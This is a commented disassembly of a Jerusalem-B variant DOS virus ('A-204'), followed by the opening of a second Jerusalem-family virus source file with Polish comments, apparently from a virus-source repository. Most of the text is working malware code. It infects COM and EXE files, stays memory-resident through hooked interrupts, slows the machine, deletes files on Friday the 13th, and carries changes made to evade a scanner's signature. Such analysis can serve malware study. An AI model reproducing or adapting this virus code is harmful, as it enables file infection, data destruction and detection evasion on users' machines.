0238 06 PUSH ES ; Store ES
0239 B8 42 01 MOV AX,0142 ; AX=0142h
023C 50 PUSH AX ; Store AX
023D EA FC 03 00 00 JMP 0:03FC
0242 8C C8 MOV AX,CS ; AX=CS
0244 8E D0 MOV SS,AX ; SS=CS
0246 BC 00 07 MOV SP,0700 ; SP=0700h
0249 33 C0 XOR AX,AX ; AX=0000h
024B 8E D8 MOV DS,AX ; DS=0000h
024D 2E A1 4B 00 CS MOV AX,W[04B] ; Restore AX
0251 A3 FC 03 MOV W[03FC],AX ; Store AX
0254 2E A0 4D 00 CS MOV AL,B[04D] ; Restore AL
0258 A2 FE 03 MOV B[03FE],AL ; Store AL
025B 8B DC MOV BX,SP ; BX=SP
025D B1 04 MOV CL,4 ; CL=04h
025F D3 EB SHR BX,CL ; BX >> 4
0261 83 C3 10 ADD BX,010 ; BX=BX+10h
0264 2E 89 1E 33 00 CS MOV W[033],BX ; Store BX. Why I don't know,
; the storing place is never
; read again
0269 B4 4A MOV AH,04A ;
026B 2E 8E 06 31 00 CS MOV ES,W[031] ; Restore ES
0270 CD 21 INT 021 ; Adjust Memory Block Size
; (SETBLOCK)
0272 B8 21 35 MOV AX,03521 ; Get original INT 21h
0275 CD 21 INT 021 ; vector
0277 2E 89 1E 17 00 CS MOV W[017],BX ; Store BX and ES of INT 21h
027C 2E 8C 06 19 00 CS MOV W[019],ES ; vector
0281 0E PUSH CS ; Store CS
0282 1F POP DS ; DS=CS
0283 BA 5B 02 MOV DX,025B ; DX=025Bh
0286 B8 21 25 MOV AX,02521 ; Set new INT 21h
0289 CD 21 INT 021 ; vector on DS:025Bh
028B 8E 06 31 00 MOV ES,W[031] ; Restore original ES
028F 26 8E 06 2C 00 ES MOV ES,W[02C] ;
0294 33 FF XOR DI,DI ; DI=0000h
0296 B9 FF 7F MOV CX,07FFF ; CX=7FFFh
0299 32 C0 XOR AL,AL ; AL=0000h
029B F2 AE REPNE SCASB ;
029D 26 38 05 ES CMP B[DI],AL ;
02A0 E0 F9 LOOPNE 029B ; No Flags: DEC CX -> 02A2h
; IF CX<>0 and not equal
; -> 029B
02A2 8B D7 MOV DX,DI ; DX=DI
02A4 83 C2 03 ADD DX,3 ; DX=DX+03h
02A7 B8 00 4B MOV AX,04B00 ; AX=4B00h
02AA 06 PUSH ES ; Store ES
02AB 1F POP DS ; Restore DS (DS:=ES)
02AC 0E PUSH CS ; Store CS
02AD 07 POP ES ; Restore ES (ES:=CS)
02AE BB 35 00 MOV BX,035 ; BX=35h
02B1 1E PUSH DS ; Store Registers
02B2 06 PUSH ES
02B3 50 PUSH AX
02B4 53 PUSH BX
02B5 51 PUSH CX
02B6 52 PUSH DX
02B7 B4 2A MOV AH,02A ; Get Current Date
02B9 CD 21 INT 021 ; DL=day
; DH=month
; CX=year
; AL=Day of the week
02BB 2E C6 06 0E 00 00 CS MOV B[0E],0 ; Set Trigger for deleting
; infected files to 00h
02C1 81 F9 C3 07 CMP CX,07C3 ; Is year 1987 ?
02C5 74 30 JE 02F7 ; Yes: -> 02F7h
02C7 3C 05 CMP AL,5 ; Is it Friday ?
02C9 75 0D JNE 02D8 ; No: -> 02D8h
02CB 80 FA 0D CMP DL,0D ; Is it 13th ?
02CE 75 08 JNE 02D8 ; No: -> 02D8h
; Yes: it is Friday
; the 13th and the
; year is not equal 1987
02D0 2E FE 06 0E 00 CS INC B[0E] ; Set Trigger for deleting
; infected files to 01h
02D5 EB 20 JMP 02F7 ; JUMP -> 02F7h
02D7 90 NOP
02D8 B8 08 35 MOV AX,03508 ; Get original INT 8h
02DB CD 21 INT 021 ; vector
02DD 2E 89 1E 13 00 CS MOV W[013],BX ; Store original BX
02E2 2E 8C 06 15 00 CS MOV W[015],ES ; and ES of INT 08h vector
02E7 0E PUSH CS
02E8 1F POP DS
02E9 C7 06 1F 00 90 7E MOV W[01F],07E90 ; Store 30d minutes into
; timer interrupt. This
; value is decreased by
; one 18.2 times per second
02EF B8 08 25 MOV AX,02508 ; Set new INT 8h vector
02F2 BA 1E 02 MOV DX,021E ; to DS:021Eh
02F5 CD 21 INT 021 ;
02F7 5A POP DX ; Restore Registers
02F8 59 POP CX
02F9 5B POP BX
02FA 58 POP AX
02FB 07 POP ES
02FC 1F POP DS
02FD 9C PUSHF ; Store Flags
02FE 2E FF 1E 17 00 CS CALL D[017] ; Call original INT 21h
; address
0303 1E PUSH DS ; Restore DS
0304 07 POP ES ; Store ES
0305 B4 49 MOV AH,049 ; Free Memory
0307 CD 21 INT 021 ;
0309 B4 4D MOV AH,04D ; Get ExitCode of
030B CD 21 INT 021 ; SubProgram (WAIT)
; Stored in AL
030D B4 31 MOV AH,031 ; AX=31[AL]h
030F BA 00 06 MOV DX,0600 ; DX=600h
0312 B1 04 MOV CL,4 ; CL=04h
0314 D3 EA SHR DX,CL ; DX >> 4 (DX=60H)
0316 83 C2 10 ADD DX,010 ; DX=DX+10h (DX=70h)
; Program Size in Paragraphs
; is 70h Bytes
0319 CD 21 INT 021 ; Terminate but Stay Resident
031B 32 C0 XOR AL,AL ; Clear AL
031D CF IRET ; Interrupt Return
; 031Eh is the new INT 08h
; vector. This routine is
; called 18.2 times per
; second
031E 2E 83 3E 1F 00 02 CS CMP W[01F],2 ; Timer decreased til 02h?
0324 75 17 JNE 033D ; No: -> 033D
; Yes: now 32 minutes are
; passed since infection
0326 50 PUSH AX ; Store Registers
0327 53 PUSH BX
0328 51 PUSH CX
0329 52 PUSH DX
032A 55 PUSH BP
032B B8 02 06 MOV AX,0602 ; Scroll box with coordinates
032E B7 87 MOV BH,087 ; (5h,5h),(10h,10h) two
0330 B9 05 05 MOV CX,0505 ; lines upwards
0333 BA 10 10 MOV DX,01010 ;
0336 CD 10 INT 010 ;
0338 5D POP BP ; Restore Registers
0339 5A POP DX
033A 59 POP CX
033B 5B POP BX
033C 58 POP AX
033D 2E FF 0E 1F 00 CS DEC W[01F] ; Decrease Timer-Trigger
; This now becomes 01h
0342 75 12 JNE 0356 ; If 0: -> 0356h
0344 2E C7 06 1F 00 01 00 CS MOV W[01F],1 ; Timer-Trigger set to 01h
034B 50 PUSH AX ; Store AX
034C 51 PUSH CX ; Store CX
034D 56 PUSH SI ; Store SI
034E B9 01 40 MOV CX,04001 ; CX=4001h
0351 F3 AC REP LODSB ; Load byte [SI] into AL and
; advance SI, done CX times.
; This is the routine which
; decreases the speed of the
; machine til 1/5th of the
; original. 32 minutes after
; infection this routine is
; executes 18.2 times a second
0353 5E POP SI ; Restore SI
0354 59 POP CX ; Restore CX
0355 58 POP AX ; Restore AX
0356 2E FF 2E 13 00 CS JMP D[013] ; Jump to original INT 08h
; address
; Here we come if INT 21h is
; called
035B 9C PUSHF ; Store Flags
035C 80 FC E0 CMP AH,0E0 ; AH=0Eh ?
035F 75 05 JNE 0366 ; No: -> 0366h
0361 B8 00 03 MOV AX,0300 ; AX=0300h
0364 9D POPF ; Restore Flags
0365 CF IRET ; Interrupt Return
0366 80 FC DD CMP AH,0DD ; AH=DDh?
0369 74 13 JE 037E ; Yes: -> 037Eh
036B 80 FC DE CMP AH,0DE ; AH=DEh?
036E 74 28 JE 0398 ; Yes: -> 0398h
; INT 21h is never called
; with AH=DEh. So the routine
; at 0398h is never used
; (seems)
0370 3D 00 4B CMP AX,04B00 ; Load & Execute ?
0373 75 03 JNE 0378 ; No: -> 0378h
0375 E9 B4 00 JMP 042C ; Yes: -> 042Ch
0378 9D POPF ; Restore Flags
0379 2E FF 2E 17 00 CS JMP D[017] ; Jmp to original
; INT 21h address
; Execute original program
037E 58 POP AX
037F 58 POP AX ; Restore AX
0380 B8 00 01 MOV AX,0100 ; AX=0100h
0383 2E A3 0A 00 CS MOV W[0A],AX ; Store AX
0387 58 POP AX ; Restore AX
0388 2E A3 0C 00 CS MOV W[0C],AX ; Store AX
038C F3 A4 REP MOVSB ;
038E 9D POPF ; Restore Flags
038F 2E A1 0F 00 CS MOV AX,W[0F] ; AX=0000h
0393 2E FF 2E 0A 00 CS JMP D[0A] ; JUMP -> CS:0100h
; This executes the original
; program
; This routine is called
; when INT 21h with AH=DEh
; is called which never
; happens in the code. I
; have to investigate it
; a bit more. Til then
; it remains without comments.
0398 83 C4 06 ADD SP,6
039B 9D POPF
039C 8C C8 MOV AX,CS
039E 8E D0 MOV SS,AX
03A0 BC 10 07 MOV SP,0710
03A3 06 PUSH ES
03A4 06 PUSH ES
03A5 33 FF XOR DI,DI
03A7 0E PUSH CS
03A8 07 POP ES
03A9 B9 10 00 MOV CX,010
03AC 8B F3 MOV SI,BX
03AE BF 21 00 MOV DI,021
03B1 F3 A4 REP MOVSB
03B3 8C D8 MOV AX,DS
03B5 8E C0 MOV ES,AX
03B7 2E F7 26 7A 00 CS MUL W[07A]
03BC 2E 03 06 2B 00 CS ADD AX,W[02B]
03C1 83 D2 00 ADC DX,0
03C4 2E F7 36 7A 00 CS DIV W[07A]
03C9 8E D8 MOV DS,AX
03CB 8B F2 MOV SI,DX
03CD 8B FA MOV DI,DX
03CF 8C C5 MOV BP,ES
03D1 2E 8B 1E 2F 00 CS MOV BX,W[02F]
03D6 0B DB OR BX,BX
03D8 74 13 JE 03ED
03DA B9 00 80 MOV CX,08000
03DD F3 A5 REP MOVSW
03DF 05 00 10 ADD AX,01000
03E2 81 C5 00 10 ADD BP,01000
03E6 8E D8 MOV DS,AX
03E8 8E C5 MOV ES,BP
03EA 4B DEC BX
03EB 75 ED JNE 03DA
03ED 2E 8B 0E 2D 00 CS MOV CX,W[02D]
03F2 F3 A4 REP MOVSB
03F4 58 POP AX
03F5 50 PUSH AX
03F6 05 10 00 ADD AX,010
03F9 2E 01 06 29 00 CS ADD W[029],AX
03FE 2E 01 06 25 00 CS ADD W[025],AX
0403 2E A1 21 00 CS MOV AX,W[021]
0407 1F POP DS
0408 07 POP ES
0409 2E 8E 16 29 00 CS MOV SS,W[029]
040E 2E 8B 26 27 00 CS MOV SP,W[027]
0413 2E FF 2E 23 00 CS JMP D[023]
; We come here if B[0Eh]=1,
; which means Friday 13th,
; year<>1987. This routine
; deletes the loaded file.
0418 33 C9 XOR CX,CX ; Clear all bits of the File
; Attribute
041A B8 01 43 MOV AX,04301 ;
041D CD 21 INT 021 ; Put File Atributes
041F B4 41 MOV AH,041 ;
0421 CD 21 INT 021 ; Delete a File (Unlink)
0423 B8 00 4B MOV AX,04B00
0426 9D POPF ; Get Flags
0427 2E FF 2E 17 00 CS JMP D[017]
; We come here each time a
; file is loaded with the
; load and execute call
; (INT 21h, AX=4B00h)
042C 2E 80 3E 0E 00 01 CS CMP B[0E],1 ; Is it Friday 13th,
; year<>1987?
0432 74 E4 JE 0418 ; Yes: -> 0418h
0434 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle -1 ???
043B 2E C7 06 8F 00 00 00 CS MOV W[08F],0 ; Clear Memory-Available
; variable
0442 2E 89 16 80 00 CS MOV W[080],DX ; DS:DX -> ASCIZ Filename,
0447 2E 8C 1E 82 00 CS MOV W[082],DS ; Store DX and DS
044C 50 PUSH AX
044D 53 PUSH BX
044E 51 PUSH CX
044F 52 PUSH DX
0450 56 PUSH SI
0451 57 PUSH DI
0452 1E PUSH DS
0453 06 PUSH ES
0454 FC CLD
0455 8B FA MOV DI,DX ;
0457 32 D2 XOR DL,DL ; DL=00h : Take Default Drive
0459 80 7D 01 3A CMP B[DI+1],03A ; ':' at 2nd place in ASCIZ-
; filename
045D 75 05 JNE 0464 ; No: -> 0464h
045F 8A 15 MOV DL,B[DI] ; Get Drive Letter
0461 80 E2 1F AND DL,01F ; Get Drive Code
; 0 = Default
; 1 = A
; 2 = B, etc.
0464 B4 36 MOV AH,036 ;
0466 CD 21 INT 021 ; Get disk space
; BX=# of available clusters
; CX=Bytes per sector
; DX=Total clusters
0468 3D FF FF CMP AX,-1 ; No Sectors Free?
046B 75 03 JNE 0470 ; No: -> 0470h
046D E9 77 02 JMP 06E7 ; Yes: -> 06E7h
0470 F7 E3 MUL BX ; Calculate Free Space
0472 F7 E1 MUL CX ;
0474 0B D2 OR DX,DX ;
0476 75 05 JNE 047D ;
0478 3D 10 07 CMP AX,0710 ; 1808 Bytes Free?
047B 72 F0 JB 046D ; No: -> 046Dh
047D 2E 8B 16 80 00 CS MOV DX,W[080] ; Restore DX's ASCIZ Filename
0482 1E PUSH DS
0483 07 POP ES
0484 32 C0 XOR AL,AL ; AL=00h
0486 B9 41 00 MOV CX,041 ;
0489 F2 AE REPNE SCASB ; Check if filename
048B 2E 8B 36 80 00 CS MOV SI,W[080] ; is in UPPERCASE
0490 8A 04 MOV AL,B[SI] ;
0492 0A C0 OR AL,AL ; All UPPERRCASE?
0494 74 0E JE 04A4 ; IF so: -> 04A4h
0496 3C 61 CMP AL,061 ; AL<'a' ?
0498 72 07 JB 04A1 ; Yes: -> 04A1h
049A 3C 7A CMP AL,07A ; AL>'z' ?
049C 77 03 JA 04A1 ; Yes: -> 04A1h
049E 80 2C 20 SUB B[SI],020 ; Transfer filename
; into UPPERCASE
04A1 46 INC SI ; SI=SI+1
04A2 EB EC JMP 0490
04A4 B9 0B 00 MOV CX,0B ; CX=0Bh
04A7 2B F1 SUB SI,CX ; Return SI to start
; of Filename
04A9 BF 84 00 MOV DI,084 ; Start of COMMAND.COM
; filename
04AC 0E PUSH CS
04AD 07 POP ES
04AE B9 0B 00 MOV CX,0B
04B1 F3 A6 REPE CMPSB ; Filename=COMMAND.COM ?
04B3 75 03 JNE 04B8 ; No: -> 04B8h
04B5 E9 2F 02 JMP 06E7 ; Yes: -> 06E7h
; We come here if the
; loaded program is not
; COMMAND.COM
04B8 B8 00 43 MOV AX,04300 ;
04BB CD 21 INT 021 ; Get File Attributes
04BD 72 05 JB 04C4 ; If Error: -> 04C4h
04BF 2E 89 0E 72 00 CS MOV W[072],CX ; Store File Attributes
04C4 72 25 JB 04EB ; If Error: -> 04EBh
04C6 32 C0 XOR AL,AL ; AL=00h
04C8 2E A2 4E 00 CS MOV B[04E],AL ; Dummy=0
04CC 1E PUSH DS ;
04CD 07 POP ES ;
04CE 8B FA MOV DI,DX ;
04D0 B9 41 00 MOV CX,041 ;
04D3 F2 AE REPNE SCASB ;
04D5 80 7D FE 4D CMP B[DI-2],04D ; "M" ?
04D9 74 0B JE 04E6 ; Yes: -> 04E6h
04DB 80 7D FE 6D CMP B[DI-2],06D ; "m" ?
04DF 74 05 JE 04E6 ; Yes: -> 04E6h
04E1 2E FE 06 4E 00 CS INC B[04E] ; Dummy=Dummy+1
04E6 B8 00 3D MOV AX,03D00 ; Open Disk File with
04E9 CD 21 INT 021 ; handle in compatibility
; mode
; DS:DX : -> ASCIZ Filename
04EB 72 5A JB 0547 ; IF Error: -> 0547h
04ED 2E A3 70 00 CS MOV W[070],AX ; Store File Handle
04F1 8B D8 MOV BX,AX ; BX=File Handle
04F3 B8 02 42 MOV AX,04202 ; Move File Read/Write
; Pointer (LSEEK) with
; offset from end of file
04F6 B9 FF FF MOV CX,-1 ; CX:DX = offset in bytes
04F9 BA FB FF MOV DX,-5 ;
04FC CD 21 INT 021 ;
; DX:AX = new absolute
; offset from beginning of
; file
04FE 72 EB JB 04EB ; If Error: -> 04EBh
0500 05 05 00 ADD AX,5 ; ????
0503 2E A3 11 00 CS MOV W[011],AX ; Store Length of File
0507 B9 05 00 MOV CX,5 ; Read from a file with
050A BA 6B 00 MOV DX,06B ; handle BX 5h bytes into
050D 8C C8 MOV AX,CS ; DS:DX buffer
050F 8E D8 MOV DS,AX ;
0511 8E C0 MOV ES,AX ;
0513 B4 3F MOV AH,03F ;
0515 CD 21 INT 021 ;
0517 8B FA MOV DI,DX ; DI=DX=6Bh
0519 BE 05 00 MOV SI,5 ; SI=05h
051C F3 A6 REPE CMPSB ; Check first 5 bytes to see
; if a file already is
; infected
051E 75 07 JNE 0527 ; If not: -> 0527h
0520 B4 3E MOV AH,03E ; Close a file with
0522 CD 21 INT 021 ; handle
0524 E9 C0 01 JMP 06E7 ; Jump -> 06E7h
0527 B8 24 35 MOV AX,03524 ; Get original int 24h
052A CD 21 INT 021 ; vector. Stored in ES:BX
052C 89 1E 1B 00 MOV W[01B],BX ; Store BX of INT 24h vector
0530 8C 06 1D 00 MOV W[01D],ES ; Store ES of INT 24h vector
0534 BA 1B 02 MOV DX,021B ; Set new int 24h vector
0537 B8 24 25 MOV AX,02524 ; to DS:DX
053A CD 21 INT 021 ;
053C C5 16 80 00 LDS DX,[080] ; DS:DX=Filename
0540 33 C9 XOR CX,CX ; Get fileattributes
0542 B8 01 43 MOV AX,04301 ; Put File Attributes
0545 CD 21 INT 021 ; (CHMOD)
0547 72 3B JB 0584 ; If Error: -> 0584h
0549 2E 8B 1E 70 00 CS MOV BX,W[070] ; Close a file with
054E B4 3E MOV AH,03E ; handle BX
0550 CD 21 INT 021 ;
0552 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle=-1 ???
0559 B8 02 3D MOV AX,03D02 ; Open File with
055C CD 21 INT 021 ; Handle in READ/WRITE mode
055E 72 24 JB 0584 ; If Error: -> 0584h
0560 2E A3 70 00 CS MOV W[070],AX ; Store File Handle
0564 8C C8 MOV AX,CS
0566 8E D8 MOV DS,AX
0568 8E C0 MOV ES,AX
056A 8B 1E 70 00 MOV BX,W[070] ; BX=File Handle
056E B8 00 57 MOV AX,05700 ; Get File' date/time-
0571 CD 21 INT 021 ; stamp
0573 89 16 74 00 MOV W[074],DX ; Move File Read/Write Pointer
0577 89 0E 76 00 MOV W[076],CX ; (LSEEK) with offset from
057B B8 00 42 MOV AX,04200 ; beginning of file with
057E 33 C9 XOR CX,CX ; CX:DX bytes
0580 8B D1 MOV DX,CX ;
0582 CD 21 INT 021 ;
0584 72 3D JB 05C3 ; If Error: -> 05C3h
0586 80 3E 4E 00 00 CMP B[04E],0 ; '0'?
058B 74 03 JE 0590 ; Yes: -> 0590h
058D EB 57 JMP 05E6 ; JUMP -> 05E6h
058F 90 NOP
0590 BB 00 10 MOV BX,01000 ; Number of 16d-byte para-
; graphs BX=1000h For COM-
; files there are 1000h 16d
; bytes paragrahs available
0593 B4 48 MOV AH,048 ;
0595 CD 21 INT 021 ; Allocate Memory
0597 73 0B JAE 05A4 ; If enough memory available
; -> 05A4h
0599 B4 3E MOV AH,03E ; Close a file with
059B 8B 1E 70 00 MOV BX,W[070] ; handle BX
059F CD 21 INT 021 ;
05A1 E9 43 01 JMP 06E7 ; JUMP -> 06E7h
05A4 FF 06 8F 00 INC W[08F] ; Set Memory-Available
; Variable (0001h)
05A8 8E C0 MOV ES,AX ;
05AA 33 F6 XOR SI,SI ; SI=0000h
05AC 8B FE MOV DI,SI ; DI=0000h
05AE B9 10 07 MOV CX,0710 ; CX=0710h (1808d)
; length of virus
05B1 F3 A4 REP MOVSB ; Put virus code at begin-
; ning of buffer ES:DI
05B3 8B D7 MOV DX,DI ; DX=DI=0710h
05B5 8B 0E 11 00 MOV CX,W[011] ; Restore Length of File
05B9 8B 1E 70 00 MOV BX,W[070] ; Restore File Handle
05BD 06 PUSH ES ; Read from a file with
05BE 1F POP DS ; handle CX (length
05BF B4 3F MOV AH,03F ; of file) bytes in buffer
05C1 CD 21 INT 021 ; DS:DX
05C3 72 1C JB 05E1 ; If Error: -> 05E1h
05C5 03 F9 ADD DI,CX ; DI=Length of original
; file+0710h (length of
; viruscode)+05h
05C7 33 C9 XOR CX,CX ; CX=0000h
05C9 8B D1 MOV DX,CX ; Move file read/write
05CB B8 00 42 MOV AX,04200 ; pointer with offset from
05CE CD 21 INT 021 ; beginning of file
05D0 BE 05 00 MOV SI,5 ;
05D3 B9 05 00 MOV CX,5 ;
05D6 F3 2E A4 REP CS MOVSB ;
05D9 8B CF MOV CX,DI ; CX=0715h(1813d)+length of
; original code
05DB 33 D2 XOR DX,DX ; DX=0000h
05DD B4 40 MOV AH,040 ; Write to file with handle
05DF CD 21 INT 021 ; CX bytes
05E1 72 0D JB 05F0 ; If Error: -> 05F0h
05E3 E9 BC 00 JMP 06A2 ; JUMP -> 06A2h
05E6 B9 1C 00 MOV CX,01C ; Read CX (1Ch) bytes from
05E9 BA 4F 00 MOV DX,04F ; file with handle
05EC B4 3F MOV AH,03F ;
05EE CD 21 INT 021 ;
05F0 72 4A JB 063C ; If Error: -> 063Ch
05F2 C7 06 61 00 84 19 MOV W[061],01984 ; Store 1984h=6532d
05F8 A1 5D 00 MOV AX,W[05D] ;
05FB A3 45 00 MOV W[045],AX ;
05FE A1 5F 00 MOV AX,W[05F] ;
0601 A3 43 00 MOV W[043],AX ;
0604 A1 63 00 MOV AX,W[063] ;
0607 A3 47 00 MOV W[047],AX ;
060A A1 65 00 MOV AX,W[065] ;
060D A3 49 00 MOV W[049],AX ;
0610 A1 53 00 MOV AX,W[053] ;
0613 83 3E 51 00 00 CMP W[051],0 ; '0000'?
0618 74 01 JE 061B ; Yes: -> 061Bh
061A 48 DEC AX ; AX=AX-01h
061B F7 26 78 00 MUL W[078] ;
061F 03 06 51 00 ADD AX,W[051] ;
0623 83 D2 00 ADC DX,0 ;
0626 05 0F 00 ADD AX,0F ;
0629 83 D2 00 ADC DX,0 ;
062C 25 F0 FF AND AX,-010 ;
062F A3 7C 00 MOV W[07C],AX ; Store AX
0632 89 16 7E 00 MOV W[07E],DX ; Store DX
0636 05 10 07 ADD AX,0710 ; AX=AX+1808
0639 83 D2 00 ADC DX,0 ;
063C 72 3A JB 0678 ; If Error :-> 0678h
063E F7 36 78 00 DIV W[078] ;
0642 0B D2 OR DX,DX ;
0644 74 01 JE 0647 ;
0646 40 INC AX ; AX=AX+01h
0647 A3 53 00 MOV W[053],AX ;
064A 89 16 51 00 MOV W[051],DX ;
064E A1 7C 00 MOV AX,W[07C] ; Restore AX
0651 8B 16 7E 00 MOV DX,W[07E] ; Restore DX
0655 F7 36 7A 00 DIV W[07A] ;
0659 2B 06 57 00 SUB AX,W[057] ;
065D A3 65 00 MOV W[065],AX ;
0660 C7 06 63 00 C5 00 MOV W[063],0C5 ;
0666 A3 5D 00 MOV W[05D],AX ;
0669 C7 06 5F 00 10 07 MOV W[05F],0710 ;
066F 33 C9 XOR CX,CX ; CX=0000h
0671 8B D1 MOV DX,CX ; DX=0000h
0673 B8 00 42 MOV AX,04200 ; Move File Read/Write
0676 CD 21 INT 021 ; pointer to beginning of
; file
0678 72 0A JB 0684 ; If Error: -> 0684h
067A B9 1C 00 MOV CX,01C ; CX=1Ch
067D BA 4F 00 MOV DX,04F ; DX=4Fh
0680 B4 40 MOV AH,040 ; Write to file with
0682 CD 21 INT 021 ; handle
0684 72 11 JB 0697 ; If Error: -> 0697h
0686 3B C1 CMP AX,CX ; Are all bytes written?
0688 75 18 JNE 06A2 ; No: -> 06A2h
068A 8B 16 7C 00 MOV DX,W[07C] ; Restore AX into DX
068E 8B 0E 7E 00 MOV CX,W[07E] ; Restore DX into CX
0692 B8 00 42 MOV AX,04200
0695 CD 21 INT 021
0697 72 09 JB 06A2 ; If Error: -> 06A2h
0699 33 D2 XOR DX,DX ; DX=0000h
069B B9 10 07 MOV CX,0710 ; CX=0710h
069E B4 40 MOV AH,040
06A0 CD 21 INT 021
06A2 2E 83 3E 8F 00 00 CS CMP W[08F],0 ; Not Enough Memory?
06A8 74 04 JE 06AE ; Yes: -> 06AEh
06AA B4 49 MOV AH,049 ; Free memory
06AC CD 21 INT 021 ;
06AE 2E 83 3E 70 00 FF CS CMP W[070],-1
06B4 74 31 JE 06E7
06B6 2E 8B 1E 70 00 CS MOV BX,W[070] ; Restore File Handle
06BB 2E 8B 16 74 00 CS MOV DX,W[074] ; Restore File Date
06C0 2E 8B 0E 76 00 CS MOV CX,W[076] ; Restore File Time
06C5 B8 01 57 MOV AX,05701 ; Set File's Date/Time
06C8 CD 21 INT 021 ; stamp
06CA B4 3E MOV AH,03E ; Close a file with
06CC CD 21 INT 021 ; handle
06CE 2E C5 16 80 00 CS LDS DX,[080] ; Get place (DS:DX) of
; filename
06D3 2E 8B 0E 72 00 CS MOV CX,W[072] ; Restore File Attributes
06D8 B8 01 43 MOV AX,04301 ; Put File Attributes
06DB CD 21 INT 021 ;
06DD 2E C5 16 1B 00 CS LDS DX,[01B] ; Restore original vector
06E2 B8 24 25 MOV AX,02524 ; of interrupt 24h
06E5 CD 21 INT 021 ;
06E7 07 POP ES ; Restore Registers
06E8 1F POP DS
06E9 5F POP DI
06EA 5E POP SI
06EB 5A POP DX
06EC 59 POP CX
06ED 5B POP BX
06EE 58 POP AX
06EF 9D POPF ; Restore Flags
06F0 2E FF 2E 17 00 CS JMP D[017] ; Call original INT 21h
; address which was intercep-
; ted with the LOAD & EXEC.
; statement. Which means it
; will load and execute the
; selected file
06F5 00 00 00 00 00 00 00 00 00 00 00
0700 4D DE 0C 00 10 00 00 00 00 00 00 00 00 00 00 00
0710 E9 92 00 JMP 07A5 ; JUMP -> 07A5h
0711h til 07A4h are the same definition words/bytes as at 0103h til 0194h
07A5 FC CLD
07A6 B4 E0 MOV AH,0E0
07A8 CD 21 INT 021
07AA 80 FC E0 CMP AH,0E0 ; AH>=E0h?
07AD 73 16 JAE 07C5 ; Yes: -> 07C5h
07AF 80 FC 03 CMP AH,3 ; AH<03h
07B2 72 11 JB 07C5 ; Yes: -> 07C5h
; The only way that the
; code get passed here if
; the virus is active in
; memory. It will return
; AX=0300h then.
07B4 B4 DD MOV AH,0DD
07B6 BF 00 01 MOV DI,0100 ; DI=0100h
07B9 BE 10 07 MOV SI,0710 ; SI=0710h
07BC 03 F7 ADD SI,DI ; SI=0810h
07BE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=Length of file
07C3 CD 21 INT 021
07C5 8C C8 MOV AX,CS ; AX=CS
07C7 05 10 00 ADD AX,010 ; AX=AX+10h
07CA 8E D0 MOV SS,AX ; SS=CS+10h
07CC BC 00 07 MOV SP,0700 ; SP=0700h
07CF 50 PUSH AX ; Store AX
07D0 B8 C5 00 MOV AX,0C5 ; AX=00C5h
07D3 50 PUSH AX ; Store AX
07D4 CB RETF ; RETURN from FAR
07D5 FC CLD ; Clear Direct
; Here the A-204 variant
; differs from the original
; Jerusalem Version B virus
; for the second time.
07D6 2E 8C 06 31 00 CS MOV W[031],ES ; These two lines have
07DB 06 PUSH ES ; been changed in order
; trying to avoid being
; detected by the finger-
; print in the VirScan.Dat
; file. It has not succeeded
; because the strain VirScan
; searches for appears two
; times in the viruscode
07DC 2E 8C 06 39 00 CS MOV W[039],ES ; Store ES
07E1 2E 8C 06 3D 00 CS MOV W[03D],ES ; Store ES
07E6 2E 8C 06 41 00 CS MOV W[041],ES ; Store ES
07EB 8C C0 MOV AX,ES ; AX=ES
07ED 05 10 00 ADD AX,010 ; AX=AX+10h
07F0 2E 01 06 49 00 CS ADD W[049],AX ; Store ES+10h
07F5 2E 01 06 45 00 CS ADD W[045],AX ; Store ES+10h
07FA B4 E0 MOV AH,0E0 ; AH=E0h
07FC CD 21 INT 021 ;
07FE 80 FC E0 CMP AH,0E0 ; AH>=E0?
0801 73 13 JAE 0816 ; Yes: -> 0816h
; This will never happen.
; First of all it would be
; a short jump into the
; original program. Secondly
; is the virus already active
; in memory and will return
; AX=0300h at the INT 21h call
; with AH=E0h
0803 80 FC 03 CMP AH,3 ; AH=03h
0806 07 POP ES ; Restore ES
0807 2E 8E 16 45 00 CS MOV SS,W[045] ; Restore ES+10 into SS
080C 2E 8B 26 43 90 CS MOV SP,W[09043] ;
0810 90 NOP ; Start ofOriginal Program
0811 90 NOP
0812 90 NOP
0813 90 NOP
0814 90 NOP
0815 90 NOP
0816 90 NOP
0817 90 NOP
0818 90 NOP
0819 90 NOP
081A 90 NOP
081B 90 NOP
081C 90 NOP
081D 90 NOP
081E 90 NOP
081F 90 NOP
0820 90 NOP
0821 90 NOP
0822 90 NOP
0823 90 NOP
0824 90 NOP
0825 90 NOP
0826 90 NOP
0827 90 NOP
0828 90 NOP
0829 90 NOP
082A 90 NOP
082B 90 NOP
082C 90 NOP
082D 90 NOP
082E 90 NOP
082F C3 RET ; End of Original Program
0830 2D 32 30 34 2A ; -204*
NOTE: A-204 is a course-code for IAP (Inleiding Apparatuur en Programmatuur,
in English a Prologue in Hardware and Software) at my university. In this
course the PDP-11 Language is being teached. It's my opion, and my opion only,
that this change has been made by a first year student. The IAP-course is
a course for first years students. Only some lines were changed in order to
avoid detection. If the 'author' did know more about the 8086, (s?)he could
have optimized the code. Some pieces can be done much more elegant.
MSDOS/J-Index/Virus.MSDOS.Unknown.j_sundyb.asm
+727
View File
@@ -0,0 +1,727 @@
; COM - na poczatku
; EXE - na koncu
; rozpoznaje wg nazwy (co nie COM = EXE)
;-------
; aktywacja w niedziele roku roznego od 1989
; procedury niszczacej
;-------
; doniesienia co 30 minut
; ale nigdy nie wlaczone
;-------
; Nie zaraza COMMAND.COM'a
;-------
LF EQU 0AH
CR EQU 0DH
;INITIAL VALUES : CS:IP 0918:00C4
; SS:SP 0918:065D
;----------------
; <- tutaj cialo programu
;----------------
S9180 SEGMENT STACK
ASSUME DS:S9180, SS:S9180 ,CS:S9180 ,ES:S9180
L9180: jmp L0095 ;L9215 ;9180 E9 92 00
db 73h,55h ;'sU' ;9183 73 55
;<- wzorzec sygnatury zarazenia
L0005 DB 0C8H,0F7h,0E1h,0EEh,0E7h ;9185 C8 F7 E1 EE E7
L000A dw 100h ;IP nosiciela COM ;918A 00 01
L000C dw 1905h ;CS nosiciela COM ;918C 05 19
L000E db 0 ;ptr aktywnosci wirusa ;918E 00
L000F dw 0 ;918F 00 00
L0011 dw 9374h ;dlugosc programu oryginalna ;9191 74 93
L0013 dw 0FEA5h ;old int 8 ;9193 A5
L0015 dw 0F000h ;9195 00
